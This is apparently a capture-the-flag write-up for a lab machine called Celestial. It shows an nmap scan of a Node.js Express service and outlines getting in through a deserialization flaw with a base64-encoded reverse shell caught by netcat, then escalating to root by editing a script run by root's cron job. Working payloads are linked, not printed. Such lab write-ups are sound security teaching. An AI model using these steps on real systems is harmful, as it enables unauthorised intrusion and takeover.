The machine runs NodeJS Express Framework on port 3000 which is vulnerable to Deserialization exploit. Privilege escalation was done by exploiting root’s cron job.
# Nmap 7.70 scan initiated Wed Jun 6 12:56:14 2018 as: nmap -p- -T4 -sV -oN celestial-full-scan.nmap -v 10.10.10.85 Warning: 10.10.10.85 giving up on port because retransmission cap hit (6). Nmap scan report for 10.10.10.85 Host is up (0.13s latency). Not shown: 65471 closed ports, 63 filtered ports PORT STATE SERVICE VERSION 3000/tcp open http Node.js Express framework Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Wed Jun 6 13:16:46 2018 -- 1 IP address (1 host up) scanned in 1231.62 seconds
- NodeJS Express Exploit: https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/
- Script to encode reverse-shell: https://github.com/ajinabraham/Node.Js-Security-Course/blob/master/nodejsshell.py
- Base64 encode the reverseshell:
- Start nc and get reverse-shell
- Find user flag
- Home directory consists a file “output.txt” which is owned by root is updated after every few minutes. Looks like a cron job
- Check Documents direcotory
- This script just prints “Script is running”. The same output provided by output.txt. This file must be run by root as a cron job. Let’s edit this file and get reverse shell.
- Start nc and listen on port 1234
- Get root key